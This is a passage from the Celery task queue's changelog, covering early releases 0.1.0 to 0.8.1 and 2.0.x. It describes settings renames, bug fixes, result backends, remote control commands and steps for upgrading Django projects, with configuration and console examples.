'localhost' AMQP_PORT = 5678 AMQP_USER = 'myuser' AMQP_PASSWORD = 'mypassword' AMQP_VHOST = 'celery' You need to change that to:: BROKER_HOST = 'localhost' BROKER_PORT = 5678 BROKER_USER = 'myuser' BROKER_PASSWORD = 'mypassword' BROKER_VHOST = 'celery' * Custom carrot backends now need to include the backend class name, so before where you had:: CARROT_BACKEND = 'mycustom.backend.module' you need to change it to:: CARROT_BACKEND = 'mycustom.backend.module.Backend' where `Backend` is the class name. 
This is probably `"Backend"`, as that was the previously implied name. * New version requirement for carrot: 0.8.0 .. _v081-changes: Changes ------- * Incorporated the multiprocessing backport patch that fixes the `processName` error. * Ignore the result of PeriodicTask's by default. * Added a Redis result store backend * Allow :file:`/etc/default/celeryd` to define additional options for the ``celeryd`` init-script. * MongoDB periodic tasks issue when using different time than UTC fixed. * Windows specific: Negate test for available ``os.fork`` (thanks :github_user:`miracle2k`). * Now tried to handle broken PID files. * Added a Django test runner to contrib that sets `CELERY_ALWAYS_EAGER = True` for testing with the database backend. * Added a :setting:`CELERY_CACHE_BACKEND` setting for using something other than the Django-global cache backend. * Use custom implementation of ``functools.partial`` for Python 2.4 support (Probably still problems with running on 2.4, but it will eventually be supported) * Prepare exception to pickle when saving :state:`RETRY` status for all backends. * SQLite no concurrency limit should only be effective if the database backend is used. .. _version-0.8.0: 0.8.0 ===== :release-date: 2009-09-22 03:06 p.m. CEST :release-by: Ask Solem .. _v080-incompatible: Backward incompatible changes ----------------------------- * Add traceback to result value on failure. .. note:: If you use the database backend you have to re-create the database table `celery_taskmeta`. Contact the :ref:`mailing-list` or :ref:`irc-channel` channel for help doing this. * Database tables are now only created if the database backend is used, so if you change back to the database backend at some point, be sure to initialize tables (django: `syncdb`, python: `celeryinit`). .. note:: This is only applies if using Django version 1.1 or higher. * Now depends on `carrot` version 0.6.0. * Now depends on python-daemon 1.4.8 .. _v080-important: Important changes ----------------- * Celery can now be used in pure Python (outside of a Django project). This means Celery is no longer Django specific. For more information see the FAQ entry :ref:`faq-is-celery-for-django-only`. * Celery now supports task retries. See :ref:`task-retry` for more information. * We now have an AMQP result store backend. It uses messages to publish task return value and status. And it's incredibly fast! See issue #6 for more info! * AMQP QoS (prefetch count) implemented: This to not receive more messages than we can handle. * Now redirects stdout/stderr to the workers log file when detached * Now uses `inspect.getargspec` to only pass default arguments the task supports. * Add Task.on_success, .on_retry, .on_failure handlers See :meth:`celery.task.base.Task.on_success`, :meth:`celery.task.base.Task.on_retry`, :meth:`celery.task.base.Task.on_failure`, * `celery.utils.gen_unique_id`: Workaround for http://bugs.python.org/issue4607 * You can now customize what happens at worker start, at process init, etc., by creating your own loaders (see :mod:`celery.loaders.default`, :mod:`celery.loaders.djangoapp`, :mod:`celery.loaders`). * Support for multiple AMQP exchanges and queues. This feature misses documentation and tests, so anyone interested is encouraged to improve this situation. * The worker now survives a restart of the AMQP server! Automatically re-establish AMQP broker connection if it's lost. New settings: * AMQP_CONNECTION_RETRY Set to `True` to enable connection retries. * AMQP_CONNECTION_MAX_RETRIES. 
Maximum number of restarts before we give up. Default: `100`. .. _v080-news: News ---- * Fix an incompatibility between python-daemon and multiprocessing, which resulted in the `[Errno 10] No child processes` problem when detaching. * Fixed a possible DjangoUnicodeDecodeError being raised when saving pickled data to Django`s Memcached cache backend. * Better Windows compatibility. * New version of the pickled field (taken from http://www.djangosnippets.org/snippets/513/) * New signals introduced: `task_sent`, `task_prerun` and `task_postrun`, see :mod:`celery.signals` for more information. * `TaskSetResult.join` caused `TypeError` when `timeout=None`. Thanks Jerzy Kozera. Closes #31 * `views.apply` should return `HttpResponse` instance. Thanks to Jerzy Kozera. Closes #32 * `PeriodicTask`: Save conversion of `run_every` from `int` to `timedelta` to the class attribute instead of on the instance. * Exceptions has been moved to `celery.exceptions`, but are still available in the previous module. * Try to rollback transaction and retry saving result if an error happens while setting task status with the database backend. * jail() refactored into :class:`celery.execute.ExecuteWrapper`. * `views.apply` now correctly sets mime-type to "application/json" * `views.task_status` now returns exception if state is :state:`RETRY` * `views.task_status` now returns traceback if state is :state:`FAILURE` or :state:`RETRY` * Documented default task arguments. * Add a sensible __repr__ to ExceptionInfo for easier debugging * Fix documentation typo `.. import map` -> `.. import dmap`. Thanks to :github_user:`mikedizon`. .. _version-0.6.0: 0.6.0 ===== :release-date: 2009-08-07 06:54 a.m. CET :release-by: Ask Solem .. _v060-important: Important changes ----------------- * Fixed a bug where tasks raising unpickleable exceptions crashed pool workers. So if you've had pool workers mysteriously disappearing, or problems with the worker stopping working, this has been fixed in this version. * Fixed a race condition with periodic tasks. * The task pool is now supervised, so if a pool worker crashes, goes away or stops responding, it is automatically replaced with a new one. * Task.name is now automatically generated out of class module+name, for example `"djangotwitter.tasks.UpdateStatusesTask"`. Very convenient. No idea why we didn't do this before. Some documentation is updated to not manually specify a task name. .. _v060-news: News ---- * Tested with Django 1.1 * New Tutorial: Creating a click counter using Carrot and Celery * Database entries for periodic tasks are now created at the workers start-up instead of for each check (which has been a forgotten TODO/XXX in the code for a long time) * New settings variable: :setting:`CELERY_TASK_RESULT_EXPIRES` Time (in seconds, or a `datetime.timedelta` object) for when after stored task results are deleted. For the moment this only works for the database backend. * The worker now emits a debug log message for which periodic tasks has been launched. * The periodic task table is now locked for reading while getting periodic task status (MySQL only so far, seeking patches for other engines) * A lot more debugging information is now available by turning on the `DEBUG` log level (`--loglevel=DEBUG`). * Functions/methods with a timeout argument now works correctly. * New: `celery.strategy.even_time_distribution`: With an iterator yielding task args, kwargs tuples, evenly distribute the processing of its tasks throughout the time window available. 
* Log message `Unknown task ignored...` now has log level `ERROR` * Log message when task is received is now emitted for all tasks, even if the task has an ETA (estimated time of arrival). Also the log message now includes the ETA for the task (if any). * Acknowledgment now happens in the pool callback. Can't do ack in the job target, as it's not pickleable (can't share AMQP connection, etc.). * Added note about .delay hanging in README * Tests now passing in Django 1.1 * Fixed discovery to make sure app is in INSTALLED_APPS * Previously overridden pool behavior (process reap, wait until pool worker available, etc.) is now handled by `multiprocessing.Pool` itself. * Convert statistics data to Unicode for use as kwargs. Thanks Lucy! .. _version-0.4.1: 0.4.1 ===== :release-date: 2009-07-02 01:42 p.m. CET :release-by: Ask Solem * Fixed a bug with parsing the message options (`mandatory`, `routing_key`, `priority`, `immediate`) .. _version-0.4.0: 0.4.0 ===== :release-date: 2009-07-01 07:29 p.m. CET :release-by: Ask Solem * Adds eager execution. `celery.execute.apply`|`Task.apply` executes the function blocking until the task is done, for API compatibility it returns a `celery.result.EagerResult` instance. You can configure Celery to always run tasks locally by setting the :setting:`CELERY_ALWAYS_EAGER` setting to `True`. * Now depends on `anyjson`. * 99% coverage using Python `coverage` 3.0. .. _version-0.3.20: 0.3.20 ====== :release-date: 2009-06-25 08:42 p.m. CET :release-by: Ask Solem * New arguments to `apply_async` (the advanced version of `delay_task`), `countdown` and `eta`; >>> # Run 10 seconds into the future. >>> res = apply_async(MyTask, countdown=10); >>> # Run 1 day from now >>> res = apply_async(MyTask, ... eta=datetime.now() + timedelta(days=1)) * Now unlinks stale PID files * Lots of more tests. * Now compatible with carrot >= 0.5.0. * **IMPORTANT** The `subtask_ids` attribute on the `TaskSetResult` instance has been removed. To get this information instead use: >>> subtask_ids = [subtask.id for subtask in ts_res.subtasks] * `Taskset.run()` now respects extra message options from the task class. * Task: Add attribute `ignore_result`: Don't store the status and return value. This means you can't use the `celery.result.AsyncResult` to check if the task is done, or get its return value. Only use if you need the performance and is able live without these features. Any exceptions raised will store the return value/status as usual. * Task: Add attribute `disable_error_emails` to disable sending error emails for that task. * Should now work on Windows (although running in the background won't work, so using the `--detach` argument results in an exception being raised). * Added support for statistics for profiling and monitoring. To start sending statistics start the worker with the `--statistics option. Then after a while you can dump the results by running `python manage.py celerystats`. See `celery.monitoring` for more information. * The Celery daemon can now be supervised (i.e., it is automatically restarted if it crashes). To use this start the worker with the --supervised` option (or alternatively `-S`). * views.apply: View calling a task. Example: .. code-block:: text http://e.com/celery/apply/task_name/arg1/arg2//?kwarg1=a&kwarg2=b .. warning:: Use with caution! Don't expose this URL to the public without first ensuring that your code is safe! * Refactored `celery.task`. 
It's now split into three modules: * ``celery.task`` Contains `apply_async`, `delay_task`, `discard_all`, and task shortcuts, plus imports objects from `celery.task.base` and `celery.task.builtins` * ``celery.task.base`` Contains task base classes: `Task`, `PeriodicTask`, `TaskSet`, `AsynchronousMapTask`, `ExecuteRemoteTask`. * ``celery.task.builtins`` Built-in tasks: `PingTask`, `DeleteExpiredTaskMetaTask`. .. _version-0.3.7: 0.3.7 ===== :release-date: 2008-06-16 11:41 p.m. CET :release-by: Ask Solem * **IMPORTANT** Now uses AMQP`s `basic.consume` instead of `basic.get`. This means we're no longer polling the broker for new messages. * **IMPORTANT** Default concurrency limit is now set to the number of CPUs available on the system. * **IMPORTANT** `tasks.register`: Renamed `task_name` argument to `name`, so:: >>> tasks.register(func, task_name='mytask') has to be replaced with:: >>> tasks.register(func, name='mytask') * The daemon now correctly runs if the pidfile is stale. * Now compatible with carrot 0.4.5 * Default AMQP connection timeout is now 4 seconds. * `AsyncResult.read()` was always returning `True`. * Only use README as long_description if the file exists so easy_install doesn't break. * `celery.view`: JSON responses now properly set its mime-type. * `apply_async` now has a `connection` keyword argument so you can re-use the same AMQP connection if you want to execute more than one task. * Handle failures in task_status view such that it won't throw 500s. * Fixed typo `AMQP_SERVER` in documentation to `AMQP_HOST`. * Worker exception emails sent to administrators now works properly. * No longer depends on `django`, so installing `celery` won't affect the preferred Django version installed. * Now works with PostgreSQL (:pypi:`psycopg2`) again by registering the `PickledObject` field. * Worker: Added `--detach` option as an alias to `--daemon`, and it's the term used in the documentation from now on. * Make sure the pool and periodic task worker thread is terminated properly at exit (so :kbd:`Control-c` works again). * Now depends on `python-daemon`. * Removed dependency to `simplejson` * Cache Backend: Re-establishes connection for every task process if the Django cache backend is :pypi:`python-memcached`/:pypi:`libmemcached`. * Tyrant Backend: Now re-establishes the connection for every task executed. .. _version-0.3.3: 0.3.3 ===== :release-date: 2009-06-08 01:07 p.m. CET :release-by: Ask Solem * The `PeriodicWorkController` now sleeps for 1 second between checking for periodic tasks to execute. .. _version-0.3.2: 0.3.2 ===== :release-date: 2009-06-08 01:07 p.m. CET :release-by: Ask Solem * worker: Added option `--discard`: Discard (delete!) all waiting messages in the queue. * Worker: The `--wakeup-after` option wasn't handled as a float. .. _version-0.3.1: 0.3.1 ===== :release-date: 2009-06-08 01:07 p.m. CET :release-by: Ask Solem * The `PeriodicTask` worker is now running in its own thread instead of blocking the `TaskController` loop. * Default `QUEUE_WAKEUP_AFTER` has been lowered to `0.1` (was `0.3`) .. _version-0.3.0: 0.3.0 ===== :release-date: 2009-06-08 12:41 p.m. CET :release-by: Ask Solem .. warning:: This is a development version, for the stable release, please see versions 0.2.x. **VERY IMPORTANT:** Pickle is now the encoder used for serializing task arguments, so be sure to flush your task queue before you upgrade. 
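One way to flush the queue from Python is the `discard_all` shortcut listed under the 0.3.7 notes above (a hedged sketch; whether the shortcut is available depends on the version you're upgrading from, and the return value shown is only illustrative):

.. code-block:: pycon

    >>> from celery.task import discard_all
    >>> discard_all()   # Deletes all waiting task messages -- irreversible!
    82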
* **IMPORTANT** TaskSet.run() now returns a ``celery.result.TaskSetResult`` instance, which lets you inspect the status and return values of a taskset as it was a single entity. * **IMPORTANT** Celery now depends on carrot >= 0.4.1. * The Celery daemon now sends task errors to the registered admin emails. To turn off this feature, set `SEND_CELERY_TASK_ERROR_EMAILS` to `False` in your `settings.py`. Thanks to Grégoire Cachet. * You can now run the Celery daemon by using `manage.py`: .. code-block:: console $ python manage.py celeryd Thanks to Grégoire Cachet. * Added support for message priorities, topic exchanges, custom routing keys for tasks. This means we've introduced `celery.task.apply_async`, a new way of executing tasks. You can use `celery.task.delay` and `celery.Task.delay` like usual, but if you want greater control over the message sent, you want `celery.task.apply_async` and `celery.Task.apply_async`. This also means the AMQP configuration has changed. Some settings has been renamed, while others are new: - ``CELERY_AMQP_EXCHANGE`` - ``CELERY_AMQP_PUBLISHER_ROUTING_KEY`` - ``CELERY_AMQP_CONSUMER_ROUTING_KEY`` - ``CELERY_AMQP_CONSUMER_QUEUE`` - ``CELERY_AMQP_EXCHANGE_TYPE`` See the entry :ref:`faq-task-routing` in the :ref:`FAQ ` for more information. * Task errors are now logged using log level `ERROR` instead of `INFO`, and stack-traces are dumped. Thanks to Grégoire Cachet. * Make every new worker process re-establish it's Django DB connection, this solving the "MySQL connection died?" exceptions. Thanks to Vitaly Babiy and Jirka Vejrazka. * **IMPORTANT** Now using pickle to encode task arguments. This means you now can pass complex Python objects to tasks as arguments. * Removed dependency to `yadayada`. * Added a FAQ, see `docs/faq.rst`. * Now converts any Unicode keys in task `kwargs` to regular strings. Thanks Vitaly Babiy. * Renamed the `TaskDaemon` to `WorkController`. * `celery.datastructures.TaskProcessQueue` is now renamed to `celery.pool.TaskPool`. * The pool algorithm has been refactored for greater performance and stability. .. _version-0.2.0: 0.2.0 ===== :release-date: 2009-05-20 05:14 p.m. CET :release-by: Ask Solem * Final release of 0.2.0 * Compatible with carrot version 0.4.0. * Fixes some syntax errors related to fetching results from the database backend. .. _version-0.2.0-pre3: 0.2.0-pre3 ========== :release-date: 2009-05-20 05:14 p.m. CET :release-by: Ask Solem * *Internal release*. Improved handling of unpickleable exceptions, `get_result` now tries to recreate something looking like the original exception. .. _version-0.2.0-pre2: 0.2.0-pre2 ========== :release-date: 2009-05-20 01:56 p.m. CET :release-by: Ask Solem * Now handles unpickleable exceptions (like the dynamically generated subclasses of `django.core.exception.MultipleObjectsReturned`). .. _version-0.2.0-pre1: 0.2.0-pre1 ========== :release-date: 2009-05-20 12:33 p.m. CET :release-by: Ask Solem * It's getting quite stable, with a lot of new features, so bump version to 0.2. This is a pre-release. * `celery.task.mark_as_read()` and `celery.task.mark_as_failure()` has been removed. Use `celery.backends.default_backend.mark_as_read()`, and `celery.backends.default_backend.mark_as_failure()` instead. .. _version-0.1.15: 0.1.15 ====== :release-date: 2009-05-19 04:13 p.m. CET :release-by: Ask Solem * The Celery daemon was leaking AMQP connections, this should be fixed, if you have any problems with too many files open (like `emfile` errors in `rabbit.log`, please contact us! .. 
_version-0.1.14: 0.1.14 ====== :release-date: 2009-05-19 01:08 p.m. CET :release-by: Ask Solem * Fixed a syntax error in the `TaskSet` class (no such variable `TimeOutError`). .. _version-0.1.13: 0.1.13 ====== :release-date: 2009-05-19 12:36 p.m. CET :release-by: Ask Solem * Forgot to add `yadayada` to install requirements. * Now deletes all expired task results, not just those marked as done. * Able to load the Tokyo Tyrant backend class without django configuration, can specify tyrant settings directly in the class constructor. * Improved API documentation * Now using the Sphinx documentation system, you can build the html documentation by doing: .. code-block:: console $ cd docs $ make html and the result will be in `docs/_build/html`. .. _version-0.1.12: 0.1.12 ====== :release-date: 2009-05-18 04:38 p.m. CET :release-by: Ask Solem * `delay_task()` etc. now returns `celery.task.AsyncResult` object, which lets you check the result and any failure that might've happened. It kind of works like the `multiprocessing.AsyncResult` class returned by `multiprocessing.Pool.map_async`. * Added ``dmap()`` and ``dmap_async()``. This works like the `multiprocessing.Pool` versions except they're tasks distributed to the Celery server. Example: .. code-block:: pycon >>> from celery.task import dmap >>> import operator >>> dmap(operator.add, [[2, 2], [4, 4], [8, 8]]) >>> [4, 8, 16] >>> from celery.task import dmap_async >>> import operator >>> result = dmap_async(operator.add, [[2, 2], [4, 4], [8, 8]]) >>> result.ready() False >>> time.sleep(1) >>> result.ready() True >>> result.result [4, 8, 16] * Refactored the task meta-data cache and database backends, and added a new backend for Tokyo Tyrant. You can set the backend in your django settings file. Example: .. code-block:: python CELERY_RESULT_BACKEND = 'database'; # Uses the database CELERY_RESULT_BACKEND = 'cache'; # Uses the django cache framework CELERY_RESULT_BACKEND = 'tyrant'; # Uses Tokyo Tyrant TT_HOST = 'localhost'; # Hostname for the Tokyo Tyrant server. TT_PORT = 6657; # Port of the Tokyo Tyrant server. .. _version-0.1.11: 0.1.11 ====== :release-date: 2009-05-12 02:08 p.m. CET :release-by: Ask Solem * The logging system was leaking file descriptors, resulting in servers stopping with the EMFILES (too many open files) error (fixed). .. _version-0.1.10: 0.1.10 ====== :release-date: 2009-05-11 12:46 p.m. CET :release-by: Ask Solem * Tasks now supports both positional arguments and keyword arguments. * Requires carrot 0.3.8. * The daemon now tries to reconnect if the connection is lost. .. _version-0.1.8: 0.1.8 ===== :release-date: 2009-05-07 12:27 p.m. CET :release-by: Ask Solem * Better test coverage * More documentation * The worker doesn't emit `Queue is empty` message if `settings.CELERYD_EMPTY_MSG_EMIT_EVERY` is 0. .. _version-0.1.7: 0.1.7 ===== :release-date: 2009-04-30 01:50 p.m. CET :release-by: Ask Solem * Added some unit tests * Can now use the database for task meta-data (like if the task has been executed or not). Set `settings.CELERY_TASK_META` * Can now run `python setup.py test` to run the unit tests from within the `tests` project. * Can set the AMQP exchange/routing key/queue using `settings.CELERY_AMQP_EXCHANGE`, `settings.CELERY_AMQP_ROUTING_KEY`, and `settings.CELERY_AMQP_CONSUMER_QUEUE`. .. _version-0.1.6: 0.1.6 ===== :release-date: 2009-04-28 02:13 p.m. CET :release-by: Ask Solem * Introducing `TaskSet`. 
A set of subtasks is executed and you can find out how many, or if all of them, are done (excellent for progress bars and such). * Now catches all exceptions when running `Task.__call__`, so the daemon doesn't die. This doesn't happen for pure functions yet, only `Task` classes. * `autodiscover()` now works with zipped eggs. * Worker: Now adds current working directory to `sys.path` for convenience. * The `run_every` attribute of `PeriodicTask` classes can now be a `datetime.timedelta()` object. * Worker: You can now set the `DJANGO_PROJECT_DIR` variable for the worker and it will add that to `sys.path` for easy launching. * Can now check if a task has been executed or not via HTTP. * You can do this by including the Celery `urls.py` into your project, >>> url(r'^celery/$', include('celery.urls')) then visiting the following URL: .. code-block:: text http://mysite/celery/$task_id/done/ this will return a JSON dictionary, for example: .. code-block:: json {"task": {"id": "TASK_ID", "executed": true}} * `delay_task` now returns string id, not `uuid.UUID` instance. * Now has `PeriodicTasks`, to have `cron`-like functionality. * Project changed name from `crunchy` to `celery`. The details of the name change request are in `docs/name_change_request.txt`. .. _version-0.1.0: 0.1.0 ===== :release-date: 2009-04-24 11:28 a.m. CET :release-by: Ask Solem * Initial release Sphinx started sucking by removing images from _static, so we need to add them here into actual content to ensure they are included :-( .. image:: ../images/celery-banner.png .. image:: ../images/celery-banner-small.png .. _changelog-2.0: =============================== Change history for Celery 2.0 =============================== .. contents:: :local: .. _version-2.0.3: 2.0.3 ===== :release-date: 2010-08-27 12:00 p.m. CEST :release-by: Ask Solem .. _v203-fixes: Fixes ----- * Worker: Properly handle connection errors happening while closing consumers. * Worker: Events are now buffered if the connection is down, then sent when the connection is re-established. * No longer depends on the :pypi:`mailer` package. This package had a namespace collision with `django-mailer`, so its functionality was replaced. * Redis result backend: Documentation typos: Redis doesn't have database names, but database numbers. The default database is now 0. * :class:`~celery.task.control.inspect`: `registered_tasks` was requesting an invalid command because of a typo. See issue #170. * :setting:`CELERY_ROUTES`: Values defined in the route should now have precedence over values defined in :setting:`CELERY_QUEUES` when merging the two. With the following settings: .. code-block:: python CELERY_QUEUES = {'cpubound': {'exchange': 'cpubound', 'routing_key': 'cpubound'}} CELERY_ROUTES = {'tasks.add': {'queue': 'cpubound', 'routing_key': 'tasks.add', 'serializer': 'json'}} The final routing options for `tasks.add` will become: .. code-block:: python {'exchange': 'cpubound', 'routing_key': 'tasks.add', 'serializer': 'json'} This wasn't the case before: the values in :setting:`CELERY_QUEUES` would take precedence. * Worker crashed if the value of :setting:`CELERY_TASK_ERROR_WHITELIST` was not an iterable. * :func:`~celery.execute.apply`: Make sure `kwargs['task_id']` is always set.
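For example, the eager path now always carries a task id, both on the returned `EagerResult` and in the task's magic `kwargs` (a sketch; ``add`` stands for any registered task, and the id string is a placeholder):

.. code-block:: pycon

    >>> from celery.execute import apply
    >>> result = apply(add, args=(2, 2), task_id='my-predetermined-id')
    >>> result.task_id
    'my-predetermined-id'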
* `AsyncResult.traceback`: Now returns :const:`None`, instead of raising :exc:`KeyError` if traceback is missing. * :class:`~celery.task.control.inspect`: Replies didn't work correctly if no destination was specified. * Can now store result/meta-data for custom states. * Worker: A warning is now emitted if the sending of task error emails fails. * ``celeryev``: Curses monitor no longer crashes if the terminal window is resized. See issue #160. * Worker: On macOS it isn't possible to run `os.exec*` in a process that's threaded. This breaks the SIGHUP restart handler, and is now disabled on macOS, emitting a warning instead. See issue #152. * :mod:`celery.execute.trace`: Properly handle `raise(str)`, which is still allowed in Python 2.4. See issue #175. * Using urllib2 in a periodic task on macOS crashed because of the proxy auto detection used in macOS. This is now fixed by using a workaround. See issue #143. * Debian init-scripts: Commands shouldn't run in a sub shell See issue #163. * Debian init-scripts: Use the absolute path of ``celeryd`` program to allow stat See issue #162. .. _v203-documentation: Documentation ------------- * getting-started/broker-installation: Fixed typo `set_permissions ""` -> `set_permissions ".*"`. * Tasks User Guide: Added section on database transactions. See issue #169. * Routing User Guide: Fixed typo `"feed": -> {"queue": "feeds"}`. See issue #169. * Documented the default values for the :setting:`CELERYD_CONCURRENCY` and :setting:`CELERYD_PREFETCH_MULTIPLIER` settings. * Tasks User Guide: Fixed typos in the subtask example * celery.signals: Documented worker_process_init. * Daemonization cookbook: Need to export DJANGO_SETTINGS_MODULE in `/etc/default/celeryd`. * Added some more FAQs from stack overflow * Daemonization cookbook: Fixed typo `CELERYD_LOGFILE/CELERYD_PIDFILE` to `CELERYD_LOG_FILE` / `CELERYD_PID_FILE` Also added troubleshooting section for the init-scripts. .. _version-2.0.2: 2.0.2 ===== :release-date: 2010-07-22 11:31 a.m. CEST :release-by: Ask Solem * Routes: When using the dict route syntax, the exchange for a task could disappear making the task unroutable. See issue #158. * Test suite now passing on Python 2.4 * No longer have to type `PYTHONPATH=.` to use ``celeryconfig`` in the current directory. This is accomplished by the default loader ensuring that the current directory is in `sys.path` when loading the config module. `sys.path` is reset to its original state after loading. Adding the current working directory to `sys.path` without the user knowing may be a security issue, as this means someone can drop a Python module in the users directory that executes arbitrary commands. This was the original reason not to do this, but if done *only when loading the config module*, this means that the behavior will only apply to the modules imported in the config module, which I think is a good compromise (certainly better than just explicitly setting `PYTHONPATH=.` anyway) * Experimental Cassandra backend added. * Worker: SIGHUP handler accidentally propagated to worker pool processes. In combination with :sha:`7a7c44e39344789f11b5346e9cc8340f5fe4846c` this would make each child process start a new worker instance when the terminal window was closed :/ * Worker: Don't install SIGHUP handler if running from a terminal. This fixes the problem where the worker is launched in the background when closing the terminal. * Worker: Now joins threads at shutdown. See issue #152. 
* Test tear down: Don't use `atexit` but nose's `teardown()` functionality instead. See issue #154. * Debian worker init-script: Stop now works correctly. * Task logger: `warn` method added (synonym for `warning`) * Can now define a white list of errors to send error emails for. Example: .. code-block:: python CELERY_TASK_ERROR_WHITELIST = ('myapp.MalformedInputError',) See issue #153. * Worker: Now handles overflow exceptions in `time.mktime` while parsing the ETA field. * LoggerWrapper: Try to detect loggers logging back to stderr/stdout making an infinite loop. * Added :class:`celery.task.control.inspect`: Inspects a running worker. Examples: .. code-block:: pycon # Inspect a single worker >>> i = inspect('myworker.example.com') # Inspect several workers >>> i = inspect(['myworker.example.com', 'myworker2.example.com']) # Inspect all workers consuming on this vhost. >>> i = inspect() ### Methods # Get currently executing tasks >>> i.active() # Get currently reserved tasks >>> i.reserved() # Get the current ETA schedule >>> i.scheduled() # Worker statistics and info >>> i.stats() # List of currently revoked tasks >>> i.revoked() # List of registered tasks >>> i.registered_tasks() * Remote control commands `dump_active`/`dump_reserved`/`dump_schedule` now replies with detailed task requests. Containing the original arguments and fields of the task requested. In addition the remote control command `set_loglevel` has been added, this only changes the log level for the main process. * Worker control command execution now catches errors and returns their string representation in the reply. * Functional test suite added :mod:`celery.tests.functional.case` contains utilities to start and stop an embedded worker process, for use in functional testing. .. _version-2.0.1: 2.0.1 ===== :release-date: 2010-07-09 03:02 p.m. CEST :release-by: Ask Solem * multiprocessing.pool: Now handles encoding errors, so that pickling errors doesn't crash the worker processes. * The remote control command replies wasn't working with RabbitMQ 1.8.0's stricter equivalence checks. If you've already hit this problem you may have to delete the declaration: .. code-block:: console $ camqadm exchange.delete celerycrq or: .. code-block:: console $ python manage.py camqadm exchange.delete celerycrq * A bug sneaked in the ETA scheduler that made it only able to execute one task per second(!) The scheduler sleeps between iterations so it doesn't consume too much CPU. It keeps a list of the scheduled items sorted by time, at each iteration it sleeps for the remaining time of the item with the nearest deadline. If there are no ETA tasks it will sleep for a minimum amount of time, one second by default. A bug sneaked in here, making it sleep for one second for every task that was scheduled. This has been fixed, so now it should move tasks like hot knife through butter. In addition a new setting has been added to control the minimum sleep interval; :setting:`CELERYD_ETA_SCHEDULER_PRECISION`. A good value for this would be a float between 0 and 1, depending on the needed precision. A value of 0.8 means that when the ETA of a task is met, it will take at most 0.8 seconds for the task to be moved to the ready queue. * Pool: Supervisor didn't release the semaphore. This would lead to a deadlock if all workers terminated prematurely. * Added Python version trove classifiers: 2.4, 2.5, 2.6 and 2.7 * Tests now passing on Python 2.7. * Task.__reduce__: Tasks created using the task decorator can now be pickled. 
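A quick way to exercise that fix (a sketch; ``myapp.tasks.add`` is a hypothetical task created with the task decorator):

.. code-block:: pycon

    >>> import pickle
    >>> from myapp.tasks import add
    >>> restored = pickle.loads(pickle.dumps(add))
    >>> restored.name == add.name
    True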
* :file:`setup.py`: :pypi:`nose` added to `tests_require`. * Pickle should now work with SQLAlchemy 0.5.x * New homepage design by Jan Henrik Helmers: http://celeryproject.org * New Sphinx theme by Armin Ronacher: http://docs.celeryproject.org/ * Fixed "pending_xref" errors shown in the HTML rendering of the documentation. Apparently this was caused by new changes in Sphinx 1.0b2. * Router classes in :setting:`CELERY_ROUTES` are now imported lazily. Importing a router class in a module that also loads the Celery environment would cause a circular dependency. This is solved by importing it when needed after the environment is set up. * :setting:`CELERY_ROUTES` was broken if set to a single dict. This example in the docs should now work again: .. code-block:: python CELERY_ROUTES = {'feed.tasks.import_feed': 'feeds'} * `CREATE_MISSING_QUEUES` wasn't honored by apply_async. * New remote control command: `stats` Dumps information about the worker, like pool process ids, and total number of tasks executed by type. Example reply: .. code-block:: python [{'worker.local': 'total': {'tasks.sleeptask': 6}, 'pool': {'timeouts': [None, None], 'processes': [60376, 60377], 'max-concurrency': 2, 'max-tasks-per-child': None, 'put-guarded-by-semaphore': True}}] * New remote control command: `dump_active` Gives a list of tasks currently being executed by the worker. By default arguments are passed through repr in case there are arguments that's not JSON encodable. If you know the arguments are JSON safe, you can pass the argument `safe=True`. Example reply: .. code-block:: pycon >>> broadcast('dump_active', arguments={'safe': False}, reply=True) [{'worker.local': [ {'args': '(1,)', 'time_start': 1278580542.6300001, 'name': 'tasks.sleeptask', 'delivery_info': { 'consumer_tag': '30', 'routing_key': 'celery', 'exchange': 'celery'}, 'hostname': 'casper.local', 'acknowledged': True, 'kwargs': '{}', 'id': '802e93e9-e470-47ed-b913-06de8510aca2', } ]}] * Added experimental support for persistent revokes. Use the `-S|--statedb` argument to the worker to enable it: .. code-block:: console $ celeryd --statedb=/var/run/celeryd This will use the file: `/var/run/celeryd.db`, as the `shelve` module automatically adds the `.db` suffix. .. _version-2.0.0: 2.0.0 ===== :release-date: 2010-07-02 02:30 p.m. CEST :release-by: Ask Solem Foreword -------- Celery 2.0 contains backward incompatible changes, the most important being that the Django dependency has been removed so Celery no longer supports Django out of the box, but instead as an add-on package called :pypi:`django-celery`. We're very sorry for breaking backwards compatibility, but there's also many new and exciting features to make up for the time you lose upgrading, so be sure to read the :ref:`News ` section. Quite a lot of potential users have been upset about the Django dependency, so maybe this is a chance to get wider adoption by the Python community as well. Big thanks to all contributors, testers and users! .. _v200-django-upgrade: Upgrading for Django-users -------------------------- Django integration has been moved to a separate package: :pypi:`django-celery`. * To upgrade you need to install the :pypi:`django-celery` module and change: .. code-block:: python INSTALLED_APPS = 'celery' to: .. code-block:: python INSTALLED_APPS = 'djcelery' * If you use `mod_wsgi` you need to add the following line to your `.wsgi` file: .. 
code-block:: python import os os.environ['CELERY_LOADER'] = 'django' * The following modules has been moved to :pypi:`django-celery`: ===================================== ===================================== **Module name** **Replace with** ===================================== ===================================== `celery.models` `djcelery.models` `celery.managers` `djcelery.managers` `celery.views` `djcelery.views` `celery.urls` `djcelery.urls` `celery.management` `djcelery.management` `celery.loaders.djangoapp` `djcelery.loaders` `celery.backends.database` `djcelery.backends.database` `celery.backends.cache` `djcelery.backends.cache` ===================================== ===================================== Importing :mod:`djcelery` will automatically setup Celery to use Django loader. loader. It does this by setting the :envvar:`CELERY_LOADER` environment variable to `"django"` (it won't change it if a loader is already set). When the Django loader is used, the "database" and "cache" result backend aliases will point to the :mod:`djcelery` backends instead of the built-in backends, and configuration will be read from the Django settings. .. _v200-upgrade: Upgrading for others -------------------- .. _v200-upgrade-database: Database result backend ~~~~~~~~~~~~~~~~~~~~~~~ The database result backend is now using `SQLAlchemy`_ instead of the Django ORM, see `Supported Databases`_ for a table of supported databases. The `DATABASE_*` settings has been replaced by a single setting: :setting:`CELERY_RESULT_DBURI`. The value here should be an `SQLAlchemy Connection String`_, some examples include: .. code-block:: python # sqlite (filename) CELERY_RESULT_DBURI = 'sqlite:///celerydb.sqlite' # mysql CELERY_RESULT_DBURI = 'mysql://scott:tiger@localhost/foo' # postgresql CELERY_RESULT_DBURI = 'postgresql://scott:tiger@localhost/mydatabase' # oracle CELERY_RESULT_DBURI = 'oracle://scott:tiger@127.0.0.1:1521/sidname' See `SQLAlchemy Connection Strings`_ for more information about connection strings. To specify additional SQLAlchemy database engine options you can use the :setting:`CELERY_RESULT_ENGINE_OPTIONS` setting: .. code-block:: python # echo enables verbose logging from 